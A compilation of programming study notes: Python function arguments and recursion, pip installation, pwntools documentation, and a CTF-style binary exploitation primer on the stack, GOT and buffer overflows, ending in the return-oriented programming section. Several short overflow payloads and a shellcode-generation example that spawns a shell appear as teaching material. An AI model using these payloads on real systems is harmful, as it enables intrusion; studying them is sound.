>>> person('Bob', 35, city='Beijing')
name: Bob age: 35 other: {'city': 'Beijing'}
>>> person('Adam', 45, gender='M', job='Engineer')
name: Adam age: 45 other: {'gender': 'M', 'job': 'Engineer'}

What is the use of the keyword argument? It extends the function's functionality. For example, in the person function, we are guaranteed to receive the two parameters name and age, but if the caller would like to provide more parameters, we can receive them as well. Imagine you are doing a user registration function and everything is optional except for the user name and age which are required, using keyword arguments to define this function will satisfy the registration requirement.

Similar to variable parameters, you can also assemble a dict first, and then, convert that dict to a keyword parameter to pass in.

>>> extra = {'city': 'Beijing', 'job': 'Engineer'}
>>> person('Jack', 24, city=extra['city'], job=extra['job'])
name: Jack age: 24 other: {'city': 'Beijing', 'job': 'Engineer'}

Of course, the above complex call can be written in a simplified way as follows.

>>> extra = {'city': 'Beijing', 'job': 'Engineer'}
>>> person('Jack', 24, **extra)
name: Jack age: 24 other: {'city': 'Beijing', 'job': 'Engineer'}

**extra means that all key-values of the dict extra are passed into the **kw parameter of the function with keyword arguments, kw will get a dict, note that the dict obtained by kw is a copy of extra, changes to kw will not affect extra outside the function.

Naming keyword arguments

For keyword arguments, the caller of a function can pass in any unrestricted keyword argument. As for exactly what is passed in, it needs to be checked inside the function via kw.

Still using the person() function as an example, we want to check for city and job parameters.

def person(name, age, **kw):
    if 'city' in kw:
        # With city parameter
        pass
    if 'job' in kw:
        # With job parameter
        pass
    print('name:', name, 'age:', age, 'other:', kw)

However, the caller can still pass in unrestricted keyword arguments.

>>> person('Jack', 24, city='Beijing', addr='Chaoyang', zipcode=123456)

If you want to restrict the names of the keyword arguments, you can use named keyword arguments, for example, to receive only city and job as keyword arguments. The functions defined in this way are as follows.

def person(name, age, *, city, job):
    print(name, age, city, job)

Unlike the keyword parameter **kw, the named keyword parameter requires a special separator *, and the parameters following * are considered as named keyword parameters.

It is called as follows.

>>> person('Jack', 24, city='Beijing', job='Engineer')
Jack 24 Beijing Engineer

If a function definition already has a variable argument, the named keyword argument that follows no longer needs a special separator *.

def person(name, age, *args, city, job):
    print(name, age, args, city, job)

Named keyword parameters must be passed with a parameter name, unlike positional parameters. If the parameter name is not passed, the call will report an error.

>>> person('Jack', 24, 'Beijing', 'Engineer')
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
TypeError: person() missing 2 required keyword-only arguments: 'city' and 'job'

Due to the missing parameter names city and job in the call, the Python interpreter treats the first two parameters as positional parameters and passes the last two parameters to *args, but the missing named keyword parameter causes an error.

Named keyword arguments can have default values, thus simplifying the call.

def person(name, age, *, city='Beijing', job):
    print(name, age, city, job)

Since the named keyword parameter city has a default value, it can be invoked without passing the city parameter.

>>> person('Jack', 24, job='Engineer')
Jack 24 Beijing Engineer

When using named keyword arguments, take special care to add a * as a special separator if there are no variable arguments. If * is missing, the Python interpreter will not recognize positional and named keyword arguments.

def person(name, age, city, job):
    # Missing *, city and job are considered as location parameters
    pass

Parameter combinations

To define functions in Python, you can use mandatory parameters, default parameters, variable parameters, keyword parameters, and named keyword parameters, all five of which can be used in combination. However, please note that the order of parameter definition must be: mandatory parameters, default parameters, variable parameters, named keyword parameters, and keyword parameters.

For example, to define a function with several of these parameters.

def f1(a, b, c=0, *args, **kw):
    print('a =', a, 'b =', b, 'c =', c, 'args =', args, 'kw =', kw)

def f2(a, b, c=0, *, d, **kw):
    print('a =', a, 'b =', b, 'c =', c, 'd =', d, 'kw =', kw)

When the function is called, the Python interpreter automatically passes in the corresponding arguments according to their positions and names.

>>> f1(1, 2)
a = 1 b = 2 c = 0 args = () kw = {}
>>> f1(1, 2, c=3)
a = 1 b = 2 c = 3 args = () kw = {}
>>> f1(1, 2, 3, 'a', 'b')
a = 1 b = 2 c = 3 args = ('a', 'b') kw = {}
>>> f1(1, 2, 3, 'a', 'b', x=99)
a = 1 b = 2 c = 3 args = ('a', 'b') kw = {'x': 99}
>>> f2(1, 2, d=99, ext=None)
a = 1 b = 2 c = 0 d = 99 kw = {'ext': None}

The most amazing thing is that with a tuples and dict you can also call the above functions.

>>> args = (1, 2, 3, 4)
>>> kw = {'d': 99, 'x': '#'}
>>> f1(*args, **kw)
a = 1 b = 2 c = 3 args = (4,) kw = {'d': 99, 'x': '#'}
>>> args = (1, 2, 3)
>>> kw = {'d': 88, 'x': '#'}
>>> f2(*args, **kw)
a = 1 b = 2 c = 3 d = 88 kw = {'x': '#'}

So, for any function, you can call it by something like func(*args, **kw), regardless of how its arguments are defined.

Although it is possible to combine up to 5 arguments, do not use too many combinations at the same time, otherwise the function interface is poorly understandable.

Summary

Python's functions have a very flexible argument form, allowing both simple calls and very complex arguments to be passed in.

The default argument must be an immutable object; if it's a mutable object, the program will run with a logic error!

Note the syntax for defining mutable and keyword arguments.

*args is a mutable parameter, args receives a tuples.

**kw is a keyword argument, kw receives a dict.

And the syntax of how to pass variable and keyword arguments when calling a function.

Variable parameters can be passed either directly: func(1, 2, 3) or by assembling a list or tuple first and then passing it through *args: func(*(1, 2, 3)).

Keyword arguments can either be passed directly: func(a=1, b=2), or assembled first in a dict and then passed in via *kw: func(**{'a': 1, 'b': 2}).

Using *args and **kw is the customary way of writing Python, but of course other parameter names can be used, but it is better to use the customary usage.

Named keyword arguments are intended to limit the parameter names that can be passed in by the caller, while providing default values.

Don't forget to write the separator * when defining named keyword parameters without mutable parameters, otherwise the definition will be a positional parameter.

Reference source code

var_args.py

kw_args.py

Recursive functions

Inside a function, other functions can be called. If a function calls itself internally, that function is recursive.

As an example, let's calculate the factorial n! = 1 x 2 x 3 x ... x n, represented by the function fact(n), it can be seen that

fact_n

So, fact(n) can be expressed as n x fact(n-1), with special treatment required only for n=1.

Thus, fact(n) is written out recursively as.

def fact(n):
    if n==1:
        return 1
    return n * fact(n - 1)

The above is a recursive function. Try:

>>> fact(1)
1
>>> fact(5)
120
>>> fact(100)
93326215443944152681699238856266700490715968264381621468592963895217599993229915608941463976156518286253697920827223758251185210916864000000000000000000000000

If we calculate fact(5), we can see the calculation process according to the function definition as follows.

===> fact(5)
===> 5 * fact(4)
===> 5 * (4 * fact(3))
===> 5 * (4 * (3 * fact(2)))
===> 5 * (4 * (3 * (2 * fact(1))))
===> 5 * (4 * (3 * (2 * 1)))
===> 5 * (4 * (3 * 2))
===> 5 * (4 * 6)
===> 5 * 24
===> 120

Recursive functions have the advantage of being simple to define and logically clear. In theory, all recursive functions can be written as loops, but the logic of loops is not as clear as recursion.

Using recursive functions requires care to prevent stack overflows. In computers, function calls are implemented through a data structure called a stack. Whenever a function call is entered, a layer of stack frames is added to the stack, and whenever the function returns, a layer of stack frames is subtracted from the stack. Since the size of the stack is not infinite, too many recursive calls can cause the stack to overflow. Try fact(1000).

>>> fact(1000)
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "<stdin>", line 4, in fact
  ...
  File "<stdin>", line 4, in fact
RuntimeError: maximum recursion depth exceeded in comparison

The solution to recursive call stack overflow is to optimize it by tail recursion. In fact, tail recursion has the same effect as a loop, so it is okay to think of a loop as a special kind of tail recursive function.

Tail recursion means that the function itself is called when it returns, and, the return statement cannot contain an expression. In this way, the compiler or interpreter can optimize the tail recursion so that the recursion itself, no matter how many times it is called, only occupies one stack frame and no stack overflow occurs.

The fact(n) function above is not tail recursive because return n * fact(n - 1) introduces a multiplicative expression. To change to a tail recursive approach, a little more code is needed, mainly to pass the product of each step into the recursive function.

def fact(n):
    return fact_iter(n, 1)

def fact_iter(num, product):
    if num == 1:
        return product
    return fact_iter(num - 1, num * product)

As you can see, return fact_iter(num - 1, num * product) returns only the recursive function itself, num - 1 and num * product are calculated before the function call and do not affect the function call.

The call to fact(5) corresponding to fact_iter(5, 1) is as follows.

===> fact_iter(5, 1)
===> fact_iter(4, 5)
===> fact_iter(3, 20)
===> fact_iter(2, 60)
===> fact_iter(1, 120)
===> 120

When tail recursive calls are made, the stack does not grow if optimizations are made, so no matter how many calls are made, it will not cause the stack to overflow.

Unfortunately, most programming languages are not optimized for tail recursion, and neither is the Python interpreter, so even if you change the fact(n) function above to a tail recursive approach, it will still result in a stack overflow.

Summary

The advantage of using recursive functions is that the logic is simple and clear, and the disadvantage is that calls that are too deep can lead to stack overflow.

Languages optimized for tail recursion can prevent stack overflows by tail recursion. Tail recursion is in fact equivalent to looping, and programming languages that don't have looping statements can only implement loops via tail recursion.

Python's standard interpreter is not optimized for tail recursion, and any recursive function has a stack overflow problem.

Reference source code

recur.py

https://yulizi123.github.io/tutorials/python-basic/basic/

https://docs.python.org/3/

https://docs.pwntools.com/en/stable/

Module installation

There are many ways to install external modules, and the form of installation varies from system to system. Installing Python packages on Windows, for example, might even kill you. Haha.

What is an external module?

An external module is what you use when you import something into a python script.

import numpy as np
import matplotlib.pyplot as plt

Numpy and matplotlib are both external modules that need to be installed. They are not part of python's own modules.

Installing Numpy

For example, there are many ways to install modules for scientific operations, such as numpy. On Windows, the easiest way is to install Anaconda, which has many necessary external modules. Install one, and save yourself the trouble of installing others.

However, I want to talk about downloading the installation package and installing it on Windows. For example, on the Numpy installer website, you can find various versions of numpy.

Module installation

In NumPy 1.10.2, we can find installers for Windows, but no Windows installers have been added to the new version yet. Then choose the appropriate "exe" installer for your system and python version. Download and install.

Module installation

If you are on MacOS or Linux, this external module is much easier to install. You can easily install it by typing a phrase into your computer's Terminal. Windows seems to have to be set up in a special way to do the same thing, I don't know... you might want to look it up. On my computer, the Terminal looks like this.

Module Installation

Then you can install it if you type in this form.

$ pip install the name of the module you want

For example

$ pip install numpy # This is for the python2+ version
$ pip3 install numpy # This is for the python3+ version

Updating external modules

Updating external modules with pip is very simple. All you need to do is type the following command into Terminal. The -U here means update.

$ pip install -U numpy # This is for the python2+ version
$ pip3 install -U numpy # This is for the python3+ version

pwntools

pwntools is a CTF framework and exploit development library. Written in Python, it is designed for rapid prototyping and development, and intended to make exploit writing as simple as possible.

The primary location for this documentation is docs.pwntools.com, which uses readthedocs. It comes in three primary flavors:

Installation

Pwntools is best supported on 64-bit Ubuntu LTS releases (14.04, 16.04, 18.04, and 20.04). Most functionality should work on any Posix-like distribution (Debian, Arch, FreeBSD, OSX, etc.).

Prerequisites

To get the most out of pwntools, you should install the following system libraries.

Binutils
Python Development Headers
- Ubuntu
- Mac OS X

Released Version

pwntools is available as a pip package for both Python2 and Python3.

Python3

$ apt-get update
$ apt-get install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential
$ python3 -m pip install --upgrade pip
$ python3 -m pip install --upgrade pwntools

Python2 (Deprecated)

NOTE: Pwntools maintainers STRONGLY recommend using Python3 for all future Pwntools-based scripts and projects.

Additionally, due to pip dropping support for Python2, a specific version of pip must be installed.

$ apt-get update
$ apt-get install python python-pip python-dev git libssl-dev libffi-dev build-essential
$ python2 -m pip install --upgrade pip==20.3.4
$ python2 -m pip install --upgrade pwntools

Command-Line Tools

When installed with sudo the above commands will install Pwntools’ command-line tools to somewhere like /usr/bin.

However, if you run as an unprivileged user, you may see a warning message that looks like this:

Follow the instructions listed and add ~/.local/bin to your $PATH environment variable.

Development

If you are hacking on Pwntools locally, you’ll want to do something like this:

$ git clone https://github.com/Gallopsled/pwntools
$ pip install --upgrade --editable ./pwntools

Getting Started

To get your feet wet with pwntools, let’s first go through a few examples.

When writing exploits, pwntools generally follows the “kitchen sink” approach.

>>> from pwn import *

This imports a lot of functionality into the global namespace. You can now assemble, disassemble, pack, unpack, and many other things with a single function.

A full list of everything that is imported is available from pwn import *.

Tutorials

A series of tutorials for Pwntools exists online, at https://github.com/Gallopsled/pwntools-tutorial#readme

Making Connections

You need to talk to the challenge binary in order to pwn it, right? pwntools makes this stupid simple with its pwnlib.tubes module.

This exposes a standard interface to talk to processes, sockets, serial ports, and all manner of things, along with some nifty helpers for common tasks. For example, remote connections via pwnlib.tubes.remote.

>>> conn = remote('ftp.ubuntu.com',21)
>>> conn.recvline() # doctest: +ELLIPSIS
b'220 ...'
>>> conn.send(b'USER anonymous\r\n')
>>> conn.recvuntil(b' ', drop=True)
b'331'
>>> conn.recvline()
b'Please specify the password.\r\n'
>>> conn.close()

It’s also easy to spin up a listener

>>> l = listen()
>>> r = remote('localhost', l.lport)
>>> c = l.wait_for_connection()
>>> r.send(b'hello')
>>> c.recv()
b'hello'

Interacting with processes is easy thanks to the pwnlib.tubes.process.

>>> sh = process('/bin/sh')
>>> sh.sendline(b'sleep 3; echo hello world;')
>>> sh.recvline(timeout=1)
b''
>>> sh.recvline(timeout=5)
b'hello world\n'
>>> sh.close()

Not only can you interact with processes programmatically, but you can actually interact with processes.

>>> sh.interactive() # doctest: +SKIP
$ whoami
user

There’s even an SSH module for when you’ve got to SSH into a box to perform a local/setuid exploit with pwnlib.tubes.ssh. You can quickly spawn processes and grab the output, or spawn a process and interact with it like a process tube.

>>> shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220)
>>> shell['whoami']
b'bandit0'
>>> shell.download_file('/etc/motd')
>>> sh = shell.run('sh')
>>> sh.sendline(b'sleep 3; echo hello world;') 
>>> sh.recvline(timeout=1)
b''
>>> sh.recvline(timeout=5)
b'hello world\n'
>>> shell.close()

Packing Integers

A common task for exploit-writing is converting between integers as Python sees them, and their representation as a sequence of bytes. Usually, folks resort to the built-in struct module.

pwntools makes this easier with pwnlib.util.packing. No more remembering unpacking codes, and littering your code with helper routines.

>>> import struct
>>> p32(0xdeadbeef) == struct.pack('I', 0xdeadbeef)
True
>>> leet = unhex('37130000')
>>> u32(b'abcd') == struct.unpack('I', b'abcd')[0]
True

The packing/unpacking operations are defined for many common bit-widths.

>>> u8(b'A') == 0x41
True

Setting the Target Architecture and OS

The target architecture can generally be specified as an argument to the routine that requires it.

>>> asm('nop')
b'\x90'
>>> asm('nop', arch='arm')
b'\x00\xf0 \xe3'

However, it can also be set once in the global context. The operating system, word size, and endianness can also be set here.

>>> context.arch      = 'i386'
>>> context.os        = 'linux'
>>> context.endian    = 'little'
>>> context.word_size = 32

Additionally, you can use a shorthand to set all of the values at once.

>>> asm('nop')
b'\x90'
>>> context(arch='arm', os='linux', endian='big', word_size=32)
>>> asm('nop')
b'\xe3 \xf0\x00'

Setting Logging Verbosity

You can control the verbosity of the standard pwntools logging via context.

For example, setting

>>> context.log_level = 'debug'

This will cause all of the data sent and received by a tube to be printed on the screen.

Assembly and Disassembly

Never again will you need to run some already-assembled pile of shellcode from the internet! The pwnlib.asm module is full of awesome.

>>> enhex(asm('mov eax, 0'))
'b800000000'

But if you do, it’s easy to suss out!

>>> print(disasm(unhex('6a0258cd80ebf9')))
   0:   6a 02                   push   0x2
   2:   58                      pop    eax
   3:   cd 80                   int    0x80
   5:   eb f9                   jmp    0x0

However, you shouldn’t even need to write your own shellcode most of the time! pwntools comes with the pwnlib.shellcraft module, which is loaded with useful time-saving shellcodes.

Let’s say that we want to setreuid(getuid(), getuid()) followed by duping file descriptor 4 to stdin, stdout, and stderr, and then pop a shell!

>>> enhex(asm(shellcraft.setreuid() + shellcraft.dupsh(4))) # doctest: +ELLIPSIS
'6a3158cd80...'

Misc Tools

Never write another hexdump, thanks to pwnlib.util.fiddling.

Find offsets in your buffer that cause a crash, thanks to pwnlib.cyclic.

>>> cyclic(20)
b'aaaabaaacaaadaaaeaaa'
>>> # Assume EIP = 0x62616166 (b'faab' which is pack(0x62616166))  at crash time
>>> cyclic_find(b'faab')
120

ELF Manipulation

Stop hard-coding things! Look them up at runtime with pwnlib.elf.

>>> e = ELF('/bin/cat')
>>> print(hex(e.address)) #doctest: +SKIP
0x400000
>>> print(hex(e.symbols['write'])) #doctest: +SKIP
0x401680
>>> print(hex(e.got['write'])) #doctest: +SKIP
0x60b070
>>> print(hex(e.plt['write'])) #doctest: +SKIP
0x401680

You can even patch and save the files.

>>> e = ELF('/bin/cat')
>>> e.read(e.address, 4)
b'\x7fELF'
>>> e.asm(e.address, 'ret')
>>> e.save('/tmp/quiet-cat')
>>> disasm(open('/tmp/quiet-cat','rb').read(1))
'   0:   c3                      ret'

Binary Exploitation

https://ctf101.org/binary-exploitation/overview/

Binaries, or executables, are machine codes for a computer to execute. For the most part, the binaries that you will face in CTFs are Linux ELF files or the occasional Windows executable. Binary Exploitation is a broad topic within Cyber Security that really comes down to finding a vulnerability in the program and exploiting it to gain control of a shell or modifying the program's functions.

Common topics addressed by Binary Exploitation or 'pwn' challenges include:

Registers
The Stack
Calling Conventions
Global Offset Table (GOT)
Buffers
- Buffer Overflow
Return Oriented Programming (ROP)
Binary Security
- No eXecute (NX)
- Address Space Layout Randomization (ASLR)
- Stack Canaries
- Relocation Read-Only (RELRO)
The Heap
- Heap Exploitation
Format String Vulnerability

Registers

A register is a location within the processor that is able to store data, much like RAM. Unlike RAM, however, accesses to registers are effectively instantaneous, whereas reads from main memory can take hundreds of CPU cycles to return.

Registers can hold any value: addresses (pointers), results from mathematical operations, characters, etc. Some registers are reserved however, meaning they have a special purpose and are not "general purpose registers" (GPRs). On x86, the only 2 reserved registers are rip and rsp which hold the address of the next instruction to execute and the address of the stack respectively.

On x86, the same register can have different-sized accesses for backward compatibility. For example, the rax register is the full 64-bit register, eax is the low 32 bits of rax, ax is the low 16 bits, al is the low 8 bits, and ah is the high 8 bits of ax (bits 8-16 of rax).

The Stack

In computer architecture, the stack is a hardware manifestation of the stack data structure (a Last In, First Out queue).

In x86, the stack is simply an area in RAM that was chosen to be the stack - there is no special hardware to store stack contents. The esp/rsp register holds the address in memory where the bottom of the stack resides. When something is pushed to the stack, esp decrements by 4 (or 8 on 64-bit x86), and the value that was pushed is stored at that location in memory. Likewise, when a pop instruction is executed, the value at esp is retrieved (i.e. esp is dereferenced), and esp is then incremented by 4 (or 8).

N.B. The stack "grows" down to lower memory addresses!

Conventionally, ebp/rbp contains the address of the top of the current stack frame, and so sometimes local variables are referenced as an offset relative to ebp rather than an offset to esp. A stack frame is essentially just the space used on the stack by a given function.

Uses

The stack is primarily used for a few things:

Storing function arguments
Storing local variables
Storing processor state between function calls

Example

Let's see what the stack looks like right after say_hi has been called in this 32-bit x86 C program:

#include <stdio.h>

void say_hi(const char * name) {
    printf("Hello %s!\n", name);
}

int main(int argc, char ** argv) {
    char * name;
    if (argc != 2) {
        return 1;
    }
    name = argv[1];
    say_hi(name);
    return 0;
}

And the relevant assembly:

0804840b <say_hi>:
 804840b:   55                      push   ebp
 804840c:   89 e5                   mov    ebp,esp
 804840e:   83 ec 08                sub    esp,0x8
 8048411:   83 ec 08                sub    esp,0x8
 8048414:   ff 75 08                push   DWORD PTR [ebp+0x8]
 8048417:   68 f0 84 04 08          push   0x80484f0
 804841c:   e8 bf fe ff ff          call   80482e0 <printf@plt>
 8048421:   83 c4 10                add    esp,0x10
 8048424:   90                      nop
 8048425:   c9                      leave
 8048426:   c3                      ret

08048427 <main>:
 8048427:   8d 4c 24 04             lea    ecx,[esp+0x4]
 804842b:   83 e4 f0                and    esp,0xfffffff0
 804842e:   ff 71 fc                push   DWORD PTR [ecx-0x4]
 8048431:   55                      push   ebp
 8048432:   89 e5                   mov    ebp,esp
 8048434:   51                      push   ecx
 8048435:   83 ec 14                sub    esp,0x14
 8048438:   89 c8                   mov    eax,ecx
 804843a:   83 38 02                cmp    DWORD PTR [eax],0x2
 804843d:   74 07                   je     8048446 <main+0x1f>
 804843f:   b8 01 00 00 00          mov    eax,0x1
 8048444:   eb 1c                   jmp    8048462 <main+0x3b>
 8048446:   8b 40 04                mov    eax,DWORD PTR [eax+0x4]
 8048449:   8b 40 04                mov    eax,DWORD PTR [eax+0x4]
 804844c:   89 45 f4                mov    DWORD PTR [ebp-0xc],eax
 804844f:   83 ec 0c                sub    esp,0xc
 8048452:   ff 75 f4                push   DWORD PTR [ebp-0xc]
 8048455:   e8 b1 ff ff ff          call   804840b <say_hi>
 804845a:   83 c4 10                add    esp,0x10
 804845d:   b8 00 00 00 00          mov    eax,0x0
 8048462:   8b 4d fc                mov    ecx,DWORD PTR [ebp-0x4]
 8048465:   c9                      leave
 8048466:   8d 61 fc                lea    esp,[ecx-0x4]
 8048469:   c3                      ret

Skipping over the bulk of main, you'll see that at 0x8048452 main's name local is pushed to the stack because it's the first argument to say_hi. Then, a call instruction is executed. call instructions first push the current instruction pointer to the stack, then jump to their destination. So when the processor begins executing say_hi at 0x0804840b, the stack looks like this:

EIP = 0x0804840b (push ebp)
ESP = 0xffff0000
EBP = 0xffff002c

        0xffff0004: 0xffffa0a0              // say_hi argument 1
ESP ->  0xffff0000: 0x0804845a              // Return address for say_hi

The first thing say_hi does is save the current ebp so that when it returns, ebp is back where main expects it to be. The stack now looks like this:

EIP = 0x0804840c (mov ebp, esp)
ESP = 0xfffefffc
EBP = 0xffff002c

        0xffff0004: 0xffffa0a0              // say_hi argument 1
        0xffff0000: 0x0804845a              // Return address for say_hi
ESP ->  0xfffefffc: 0xffff002c              // Saved EBP

Again, note how esp gets smaller when values are pushed to the stack.

Next, the current esp is saved into ebp, marking the top of the new stack frame.

EIP = 0x0804840e (sub esp, 0x8)
ESP = 0xfffefffc
EBP = 0xfffefffc

            0xffff0004: 0xffffa0a0              // say_hi argument 1
            0xffff0000: 0x0804845a              // Return address for say_hi
ESP, EBP -> 0xfffefffc: 0xffff002c              // Saved EBP

Then, the stack is "grown" to accommodate local variables inside say_hi.

EIP = 0x08048414 (push [ebp + 0x8])
ESP = 0xfffeffec
EBP = 0xfffefffc

        0xffff0004: 0xffffa0a0              // say_hi argument 1
        0xffff0000: 0x0804845a              // Return address for say_hi
EBP ->  0xfffefffc: 0xffff002c              // Saved EBP
        0xfffefff8: UNDEFINED
        0xfffefff4: UNDEFINED
        0xfffefff0: UNDEFINED
ESP ->  0xfffefffc: UNDEFINED

NOTE: stack space is not implicitly cleared!

Now, the 2 arguments to printf are pushed in reverse order.

EIP = 0x0804841c (call printf@plt)
ESP = 0xfffeffe4
EBP = 0xfffefffc

        0xffff0004: 0xffffa0a0              // say_hi argument 1
        0xffff0000: 0x0804845a              // Return address for say_hi
EBP ->  0xfffefffc: 0xffff002c              // Saved EBP
        0xfffefff8: UNDEFINED
        0xfffefff4: UNDEFINED
        0xfffefff0: UNDEFINED
        0xfffeffec: UNDEFINED
        0xfffeffe8: 0xffffa0a0              // printf argument 2
ESP ->  0xfffeffe4: 0x080484f0              // printf argument 1

Finally, printf is called, which pushes the address of the next instruction to execute.

EIP = 0x080482e0
ESP = 0xfffeffe4
EBP = 0xfffefffc

        0xffff0004: 0xffffa0a0              // say_hi argument 1
        0xffff0000: 0x0804845a              // Return address for say_hi
EBP ->  0xfffefffc: 0xffff002c              // Saved EBP
        0xfffefff8: UNDEFINED
        0xfffefff4: UNDEFINED
        0xfffefff0: UNDEFINED
        0xfffeffec: UNDEFINED
        0xfffeffe8: 0xffffa0a0              // printf argument 2
        0xfffeffe4: 0x080484f0              // printf argument 1
ESP ->  0xfffeffe0: 0x08048421              // Return address for printf

Once printf has returned, the leave instruction moves ebp into esp, and pops the saved EBP.

EIP = 0x08048426 (ret)
ESP = 0xfffefffc
EBP = 0xffff002c

        0xffff0004: 0xffffa0a0              // say_hi argument 1
ESP ->  0xffff0000: 0x0804845a              // Return address for say_hi

And finally, ret pops the saved instruction pointer into eip which causes the program to return to main with the same esp, ebp, and stack contents as when say_hi was initially called.

EIP = 0x0804845a (add esp, 0x10)
ESP = 0xffff0000
EBP = 0xffff002c

ESP ->  0xffff0004: 0xffffa0a0              // say_hi argument 1

Calling Conventions

To be able to call functions, there needs to be an agreed-upon way to pass arguments. If a program is entirely self-contained in a binary, the compiler would be free to decide the calling convention. However, in reality, shared libraries are used so that common code (e.g. libc) can be stored once and dynamically linked into programs that need it, reducing program size.

In Linux binaries, there are really only two commonly used calling conventions: cdecl for 32-bit binaries, and SysV for 64-bit

cdecl

In 32-bit binaries on Linux, function arguments are passed in on the stack in reverse order. A function like this:

int add(int a, int b, int c) {
    return a + b + c;
}

would be invoked by pushing c, then b, then a.

SysV

For 64-bit binaries, function arguments are first passed in certain registers:

then any leftover arguments are pushed onto the stack in reverse order, as in cdecl.

Other Conventions

Any method of passing arguments could be used as long as the compiler is aware of what the convention is. As a result, there have been many calling conventions in the past that aren't used frequently anymore. See Wikipedia for a comprehensive list.

GOT

The Global Offset Table (or GOT) is a section inside of programs that hold addresses of functions that are dynamically linked. As mentioned in the page on calling conventions, most programs don't include every function they use to reduce binary size. Instead, common functions (like those in libc) are "linked" into the program so they can be saved once on disk and reused by every program.

Unless a program is marked full RELRO, the resolution of the function to address in a dynamic library is done lazily. All dynamic libraries are loaded into memory along with the main program at launch, however, functions are not mapped to their actual code until they're first called. For example, in the following C snippet puts won't be resolved to an address in libc until after it has been called once:

int main() {
    puts("Hi there!");
    puts("Ok bye now.");
    return 0;
}

To avoid searching through shared libraries each time a function is called, the result of the lookup is saved into the GOT so future function calls "short circuit" straight to their implementation bypassing the dynamic resolver.

This has two important implications:

The GOT contains pointers to libraries which move around due to ASLR
The GOT is writable

These two facts will become very useful to use in Return Oriented Programming

PLT

Before the address of a function has been resolved, the GOT points to an entry in the Procedure Linkage Table (PLT). This is a small "stub" function that is responsible for calling the dynamic linker with (effectively) the name of the function that should be resolved.

Buffers

A buffer is any allocated space in memory where data (often user input) can be stored. For example, in the following C program name would be considered a stack buffer:

#include <stdio.h>

int main() {
    char name[64] = {0};
    read(0, name, 63);
    printf("Hello %s", name);
    return 0;
}

Buffers could also be global variables:

#include <stdio.h>

char name[64] = {0};

int main() {
    read(0, name, 63);
    printf("Hello %s", name);
    return 0;
}

Or dynamically allocated on the heap:

#include <stdio.h>
#include <stdlib.h>

int main() {
    char *name = malloc(64);
    memset(name, 0, 64);
    read(0, name, 63);
    printf("Hello %s", name);
    return 0;
}

Exploits

Given that buffers commonly hold user input, mistakes when writing to them could result in attacker-controlled data being written outside of the buffer's space. See the page on buffer overflows for more.

Buffer Overflow

A Buffer Overflow is a vulnerability in which data can be written that exceeds the allocated space, allowing an attacker to overwrite other data.

Stack buffer overflow

The simplest and most common buffer overflow is one where the buffer is on the stack. Let's look at an example.

#include <stdio.h>

int main() {
    int secret = 0xdeadbeef;
    char name[100] = {0};
    read(0, name, 0x100);
    if (secret == 0x1337) {
        puts("Wow! Here's a secret.");
    } else {
        puts("I guess you're not cool enough to see my secret");
    }
}

There's a tiny mistake in this program which will allow us to see the secret. name is decimal 100 bytes, however, we're reading in hex 100 bytes (=256 decimal bytes)! Let's see how we can use this to our advantage.

If the compiler chose to layout the stack like this:

        0xffff006c: 0xf7f7f7f7  // Saved EIP
        0xffff0068: 0xffff0100  // Saved EBP
        0xffff0064: 0xdeadbeef  // secret
...
        0xffff0004: 0x0
ESP ->  0xffff0000: 0x0         // name

let's look at what happens when we read in 0x100 bytes of 'A's.

The first decimal 100 bytes are saved properly:

        0xffff006c: 0xf7f7f7f7  // Saved EIP
        0xffff0068: 0xffff0100  // Saved EBP
        0xffff0064: 0xdeadbeef  // secret
...
        0xffff0004: 0x41414141
ESP ->  0xffff0000: 0x41414141  // name

However, when the 101st byte is read in, we see an issue:

        0xffff006c: 0xf7f7f7f7  // Saved EIP
        0xffff0068: 0xffff0100  // Saved EBP
        0xffff0064: 0xdeadbe41  // secret
...
        0xffff0004: 0x41414141
ESP ->  0xffff0000: 0x41414141  // name

The least significant byte of the secret has been overwritten! If we follow the next 3 bytes to be read in, we'll see the entirety of the secret is "clobbered" with our 'A's

        0xffff006c: 0xf7f7f7f7  // Saved EIP
        0xffff0068: 0xffff0100  // Saved EBP
        0xffff0064: 0x41414141  // secret
...
        0xffff0004: 0x41414141
ESP ->  0xffff0000: 0x41414141  // name

The remaining 152 bytes would continue clobbering values up the stack.

Passing an impossible check

How can we use this to pass the seemingly impossible check in the original program? Well, if we carefully line up our input so that the bytes that overwrite the secret happen to be the bytes that represent 0x1337 in Little Endian, we'll see the secret message.

A small Python one-liner will work nicely: python -c "print 'A'*100 + '\x31\x13\x00\x00'"

This will fill the name buffer with 100 'A's, then overwrite the secret with the 32-bit little-endian encoding of 0x1337.

Going one step further

As discussed on the stack page, the instruction that the current function should jump to when it is done is also saved on the stack (denoted as "Saved EIP" in the above stack diagrams). If we can overwrite this, we can control where the program jumps after the main finishes running, giving us the ability to control what the program does entirely.

Usually, the end objective in binary exploitation is to get a shell (often called "popping a shell") on the remote computer. The shell provides us with an easy way to run anything we want on the target computer.

Say there happens to be a nice function that does this define somewhere else in the program that we normally can't get to:

void give_shell() {
    system("/bin/sh");
}

Well with our buffer overflow knowledge, now we can! All we have to do is overwrite the saved EIP on the stack to the address where give_shell is. Then, when the main returns, it will pop that address off of the stack and jump to it, running give_shell, and giving us our shell.

Assuming give_shell is at 0x08048fd0, we could use something like this: python -c "print 'A'*108 + '\xd0\x8f\x04\x08'"

We send 108 'A's to overwrite the 100 bytes that are allocated for the name, the 4 bytes for secret, and the 4 bytes for the saved EBP. Then we simply send the little-endian form of give_shell's address, and we would get a shell!

This idea is extended on in Return Oriented Programming

Return Oriented Programming

Return Oriented Programming (or ROP) is the idea of chaining together small snippets of assembly with stack control to cause the program to do more complex things.

As we saw in buffer overflows, having stack control can be very powerful since it allows us to overwrite saved instruction pointers, giving us control over what the program does next. Most programs don't have a convenient give_shell function, however, so we need to find a way to manually invoke the system or another exec function to get us our shell.

32 bit

Imagine we have a program similar to the following:

#include <stdio.h>
#include <stdlib.h>

char name[32];

int main() {
    printf("What's your name? ");
    read(0, name, 32);

    printf("Hi %s\n", name);

    printf("The time is currently ");
    system("/bin/date");

    char echo[100];
    printf("What do you want me to echo back? ");
    read(0, echo, 1000);
    puts(echo);

    return 0;
}

We obviously have a stack buffer overflow on the echo variable which can give us EIP control when the main returns. But we don't have a give_shell function! So what can we do?

We can call the system with an argument we control! Since arguments are passed in on the stack in 32-bit Linux programs (see calling conventions), if we have stack control, we have argument control.

